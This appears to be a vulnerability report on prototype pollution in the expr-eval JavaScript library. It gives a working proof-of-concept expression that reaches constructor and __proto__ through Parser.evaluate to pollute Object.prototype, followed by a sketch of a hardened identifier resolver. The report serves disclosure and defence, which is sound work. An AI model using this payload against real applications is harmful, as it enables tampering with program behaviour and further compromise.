Prototype Pollution in silentmatt/expr-eval
Valid
Reported on Mar 26th 2021
✍️ Description
With specific input, attackers can define properties on the prototype, which will lead to prototype pollution.
Requires Node.js version >= 12.0.0, which introduced Object.fromEntries.
🕵️‍♂️ Proof of Concept
// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted
💥 Impact
This vulnerability allows prototype pollution.
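The PoC passes no variables, so `constructor` and `__proto__` can only resolve through properties the evaluation scope inherits. The sketch below is an added example, not code from this report or from expr-eval: it contrasts a plain property read with an own-property lookup on a null-prototype scope. The names `naiveResolve`, `safeResolve`, `makeScope` and `audit` are hypothetical, and the sample inputs are constructed.

```javascript
// Added example (not expr-eval source): a constructed, minimal variable resolver.

// Names that reach the prototype chain when read from an ordinary object.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive lookup: a plain property read, so inherited members resolve too.
function naiveResolve(scope, name) {
  return scope[name];
}

// Hardened lookup: own properties only, blocked names rejected outright.
function safeResolve(scope, name) {
  if (BLOCKED.has(name)) {
    throw new Error(`identifier not allowed: ${name}`);
  }
  if (!Object.prototype.hasOwnProperty.call(scope, name)) {
    throw new Error(`undefined variable: ${name}`);
  }
  return scope[name];
}

// Copy caller-supplied variables into a null-prototype object so that
// nothing is inherited, dropping blocked keys (e.g. from parsed JSON).
function makeScope(vars) {
  const scope = Object.create(null);
  for (const key of Object.keys(vars)) {
    if (!BLOCKED.has(key)) scope[key] = vars[key];
  }
  return scope;
}

// Report how each strategy treats a list of identifiers (constructed input).
function audit(names) {
  const plain = { x: 1 };
  const scope = makeScope(plain);
  return names.map((name) => {
    const naive = naiveResolve(plain, name) !== undefined ? 'resolved' : 'undefined';
    let safe = 'resolved';
    try { safeResolve(scope, name); } catch (e) { safe = 'rejected'; }
    return { name, naive, safe };
  });
}

console.log(audit(['x', 'constructor', '__proto__', 'toString']));
```

An expression evaluator that resolves identifiers this way never hands user expressions a reference to `Object` or `Object.prototype` unless the caller supplies one explicitly.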